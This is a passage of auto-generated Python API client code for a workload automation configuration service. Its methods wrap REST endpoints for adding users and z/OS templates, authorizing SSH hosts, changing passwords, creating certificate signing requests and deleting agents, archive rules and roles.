If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_user_with_http_info(user_file, **kwargs) # noqa: E501
else:
(data) = self.add_user_with_http_info(user_file, **kwargs) # noqa: E501
return data
def add_user_with_http_info(self, user_file, **kwargs): # noqa: E501
"""Add user # noqa: E501
Add user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_user_with_http_info(user_file, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user_file: (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user_file'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user_file' is set
if ('user_file' not in params or
params['user_file'] is None):
raise ValueError("Missing the required parameter `user_file` when calling `add_user`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'user_file' in params:
local_var_files['userFile'] = params['user_file'] # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/authorization/user', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_zos_template(self, body, server, agent, template_name, **kwargs): # noqa: E501
"""Add z/OS Template # noqa: E501
Add z/OS Template # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_zos_template(body, server, agent, template_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ZosTemplateData body: z/OS Template Data (required)
:param str server: The Server (required)
:param str agent: The Agent (required)
:param str template_name: The z/OS Template Name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_zos_template_with_http_info(body, server, agent, template_name, **kwargs) # noqa: E501
else:
(data) = self.add_zos_template_with_http_info(body, server, agent, template_name, **kwargs) # noqa: E501
return data
def add_zos_template_with_http_info(self, body, server, agent, template_name, **kwargs): # noqa: E501
"""Add z/OS Template # noqa: E501
Add z/OS Template # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_zos_template_with_http_info(body, server, agent, template_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ZosTemplateData body: z/OS Template Data (required)
:param str server: The Server (required)
:param str agent: The Agent (required)
:param str template_name: The z/OS Template Name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'server', 'agent', 'template_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_zos_template" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_zos_template`") # noqa: E501
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `add_zos_template`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `add_zos_template`") # noqa: E501
# verify the required parameter 'template_name' is set
if ('template_name' not in params or
params['template_name'] is None):
raise ValueError("Missing the required parameter `template_name` when calling `add_zos_template`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
if 'template_name' in params:
path_params['templateName'] = params['template_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/agent/{agent}/mft/zostemplate/{templateName}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def authorize_mft_ssh_cluster(self, body, server, agent, cluster_name, **kwargs): # noqa: E501
"""Authorize SSH Cluster # noqa: E501
Authorize SSH Cluster # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.authorize_mft_ssh_cluster(body, server, agent, cluster_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClusterAuthorizationData body: File with content of hostnames and ports (required)
:param str server: The Server (required)
:param str agent: The Agent (required)
:param str cluster_name: Ssh Cluster Name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.authorize_mft_ssh_cluster_with_http_info(body, server, agent, cluster_name, **kwargs) # noqa: E501
else:
(data) = self.authorize_mft_ssh_cluster_with_http_info(body, server, agent, cluster_name, **kwargs) # noqa: E501
return data
def authorize_mft_ssh_cluster_with_http_info(self, body, server, agent, cluster_name, **kwargs): # noqa: E501
"""Authorize SSH Cluster # noqa: E501
Authorize SSH Cluster # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.authorize_mft_ssh_cluster_with_http_info(body, server, agent, cluster_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ClusterAuthorizationData body: File with content of hostnames and ports (required)
:param str server: The Server (required)
:param str agent: The Agent (required)
:param str cluster_name: Ssh Cluster Name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'server', 'agent', 'cluster_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method authorize_mft_ssh_cluster" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `authorize_mft_ssh_cluster`") # noqa: E501
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `authorize_mft_ssh_cluster`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `authorize_mft_ssh_cluster`") # noqa: E501
# verify the required parameter 'cluster_name' is set
if ('cluster_name' not in params or
params['cluster_name'] is None):
raise ValueError("Missing the required parameter `cluster_name` when calling `authorize_mft_ssh_cluster`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
if 'cluster_name' in params:
path_params['clusterName'] = params['cluster_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/agent/{agent}/mft/ssh/cluster/{clusterName}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def authorize_mft_ssh_host(self, server, agent, hostname, **kwargs): # noqa: E501
"""Authorize SSH Host # noqa: E501
Authorize SSH Host for SFTP account # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.authorize_mft_ssh_host(server, agent, hostname, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server (required)
:param str agent: The Agent (required)
:param str hostname: Ssh Hostname (required)
:param str port: Ssh port for the relevant host
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.authorize_mft_ssh_host_with_http_info(server, agent, hostname, **kwargs) # noqa: E501
else:
(data) = self.authorize_mft_ssh_host_with_http_info(server, agent, hostname, **kwargs) # noqa: E501
return data
def authorize_mft_ssh_host_with_http_info(self, server, agent, hostname, **kwargs): # noqa: E501
"""Authorize SSH Host # noqa: E501
Authorize SSH Host for SFTP account # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.authorize_mft_ssh_host_with_http_info(server, agent, hostname, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server (required)
:param str agent: The Agent (required)
:param str hostname: Ssh Hostname (required)
:param str port: Ssh port for the relevant host
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server', 'agent', 'hostname', 'port'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method authorize_mft_ssh_host" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `authorize_mft_ssh_host`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `authorize_mft_ssh_host`") # noqa: E501
# verify the required parameter 'hostname' is set
if ('hostname' not in params or
params['hostname'] is None):
raise ValueError("Missing the required parameter `hostname` when calling `authorize_mft_ssh_host`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
if 'hostname' in params:
path_params['hostname'] = params['hostname'] # noqa: E501
query_params = []
if 'port' in params:
query_params.append(('port', params['port'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/agent/{agent}/mft/ssh/host/{hostname}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def authorize_ssh_known_remotehost(self, server, remotehost, **kwargs): # noqa: E501
"""Authorize # noqa: E501
Authorized known ssh remote host. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.authorize_ssh_known_remotehost(server, remotehost, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the remote host is connected to. (required)
:param str remotehost: The name of the remote host. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.authorize_ssh_known_remotehost_with_http_info(server, remotehost, **kwargs) # noqa: E501
else:
(data) = self.authorize_ssh_known_remotehost_with_http_info(server, remotehost, **kwargs) # noqa: E501
return data
def authorize_ssh_known_remotehost_with_http_info(self, server, remotehost, **kwargs): # noqa: E501
"""Authorize # noqa: E501
Authorized known ssh remote host. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.authorize_ssh_known_remotehost_with_http_info(server, remotehost, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the remote host is connected to. (required)
:param str remotehost: The name of the remote host. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server', 'remotehost'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method authorize_ssh_known_remotehost" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `authorize_ssh_known_remotehost`") # noqa: E501
# verify the required parameter 'remotehost' is set
if ('remotehost' not in params or
params['remotehost'] is None):
raise ValueError("Missing the required parameter `remotehost` when calling `authorize_ssh_known_remotehost`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'remotehost' in params:
path_params['remotehost'] = params['remotehost'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/remotehost/{remotehost}/authorize', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def change_user_password(self, user, **kwargs): # noqa: E501
"""Change user password # noqa: E501
Change user password # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.change_user_password(user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user: user name (required)
:param UserPassword body: The new password.
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.change_user_password_with_http_info(user, **kwargs) # noqa: E501
else:
(data) = self.change_user_password_with_http_info(user, **kwargs) # noqa: E501
return data
def change_user_password_with_http_info(self, user, **kwargs): # noqa: E501
"""Change user password # noqa: E501
Change user password # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.change_user_password_with_http_info(user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user: user name (required)
:param UserPassword body: The new password.
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method change_user_password" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user' is set
if ('user' not in params or
params['user'] is None):
raise ValueError("Missing the required parameter `user` when calling `change_user_password`") # noqa: E501
collection_formats = {}
path_params = {}
if 'user' in params:
path_params['user'] = params['user'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/user/{user}/password/adminUpdate', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_agent_certificate_signing_request(self, body, server, agent, **kwargs): # noqa: E501
"""Create certificate signing request (CSR). # noqa: E501
Create certificate signing request (CSR) on SSL configured Agent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_agent_certificate_signing_request(body, server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param CertificateSigningRequestData body: Certificate Signing Request (CSR) data (required)
:param str server: The Server. (required)
:param str agent: The Agent. (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_agent_certificate_signing_request_with_http_info(body, server, agent, **kwargs) # noqa: E501
else:
(data) = self.create_agent_certificate_signing_request_with_http_info(body, server, agent, **kwargs) # noqa: E501
return data
def create_agent_certificate_signing_request_with_http_info(self, body, server, agent, **kwargs): # noqa: E501
"""Create certificate signing request (CSR). # noqa: E501
Create certificate signing request (CSR) on SSL configured Agent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_agent_certificate_signing_request_with_http_info(body, server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param CertificateSigningRequestData body: Certificate Signing Request (CSR) data (required)
:param str server: The Server. (required)
:param str agent: The Agent. (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'server', 'agent'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_agent_certificate_signing_request" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_agent_certificate_signing_request`") # noqa: E501
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `create_agent_certificate_signing_request`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `create_agent_certificate_signing_request`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'text/plain']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/agent/{agent}/csr', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_run_as_user(self, body, server, **kwargs): # noqa: E501
"""Add a new Run-as user # noqa: E501
Add a new Run-as user to server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_run_as_user(body, server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param RunAsUserData body: Run as user data (required)
:param str server: The Server. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_run_as_user_with_http_info(body, server, **kwargs) # noqa: E501
else:
(data) = self.create_run_as_user_with_http_info(body, server, **kwargs) # noqa: E501
return data
def create_run_as_user_with_http_info(self, body, server, **kwargs): # noqa: E501
"""Add a new Run-as user # noqa: E501
Add a new Run-as user to server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_run_as_user_with_http_info(body, server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param RunAsUserData body: Run as user data (required)
:param str server: The Server. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'server'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_run_as_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_run_as_user`") # noqa: E501
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `create_run_as_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/runasuser', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_agent(self, server, agent, **kwargs): # noqa: E501
"""delete an agent from Server # noqa: E501
Delete an agent from a Server. This will not shut the agent down. It only disconnects and removes it from the list. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_agent(server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the agent is connected to. (required)
:param str agent: The name of the agent to delete. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_agent_with_http_info(server, agent, **kwargs) # noqa: E501
else:
(data) = self.delete_agent_with_http_info(server, agent, **kwargs) # noqa: E501
return data
def delete_agent_with_http_info(self, server, agent, **kwargs): # noqa: E501
"""delete an agent from Server # noqa: E501
Delete an agent from a Server. This will not shut the agent down. It only disconnects and removes it from the list. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_agent_with_http_info(server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the agent is connected to. (required)
:param str agent: The name of the agent to delete. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server', 'agent'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_agent" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `delete_agent`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `delete_agent`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/agent/{agent}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_archive_rule(self, rule_name, delete_rule_data_flag, **kwargs): # noqa: E501
"""Delete Workload Archiving rule # noqa: E501
Deletes Workload Archiving rule by name. It is required to send deleteRuleData flag to specify if rule need to be deleted with all the collected data or deleteRuleWithoutData otherwise. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_archive_rule(rule_name, delete_rule_data_flag, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str rule_name: Rule name to delete (required)
:param str delete_rule_data_flag: Remove rule with collected data or without. REQUIRED. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_archive_rule_with_http_info(rule_name, delete_rule_data_flag, **kwargs) # noqa: E501
else:
(data) = self.delete_archive_rule_with_http_info(rule_name, delete_rule_data_flag, **kwargs) # noqa: E501
return data
def delete_archive_rule_with_http_info(self, rule_name, delete_rule_data_flag, **kwargs): # noqa: E501
"""Delete Workload Archiving rule # noqa: E501
Deletes Workload Archiving rule by name. It is required to send deleteRuleData flag to specify if rule need to be deleted with all the collected data or deleteRuleWithoutData otherwise. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_archive_rule_with_http_info(rule_name, delete_rule_data_flag, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str rule_name: Rule name to delete (required)
:param str delete_rule_data_flag: Remove rule with collected data or without. REQUIRED. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['rule_name', 'delete_rule_data_flag'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_archive_rule" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'rule_name' is set
if ('rule_name' not in params or
params['rule_name'] is None):
raise ValueError("Missing the required parameter `rule_name` when calling `delete_archive_rule`") # noqa: E501
# verify the required parameter 'delete_rule_data_flag' is set
if ('delete_rule_data_flag' not in params or
params['delete_rule_data_flag'] is None):
raise ValueError("Missing the required parameter `delete_rule_data_flag` when calling `delete_archive_rule`") # noqa: E501
collection_formats = {}
path_params = {}
if 'rule_name' in params:
path_params['ruleName'] = params['rule_name'] # noqa: E501
query_params = []
if 'delete_rule_data_flag' in params:
query_params.append(('deleteRuleDataFlag', params['delete_rule_data_flag'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/archive/rule/{ruleName}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_authorization_role(self, role, **kwargs): # noqa: E501
"""Delete Authorization Role # noqa: E501
Delete Authorization Role # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_authorization_role(role, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str role: The Role name. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_authorization_role_with_http_info(role, **kwargs) # noqa: E501
else:
(data) = self.delete_authorization_role_with_http_info(role, **kwargs) # noqa: E501
return data
def delete_authorization_role_with_http_info(self, role, **kwargs): # noqa: E501
"""Delete Authorization Role # noqa: E501
Delete Authorization Role # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_authorization_role_with_http_info(role, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str role: The Role name. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['role'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
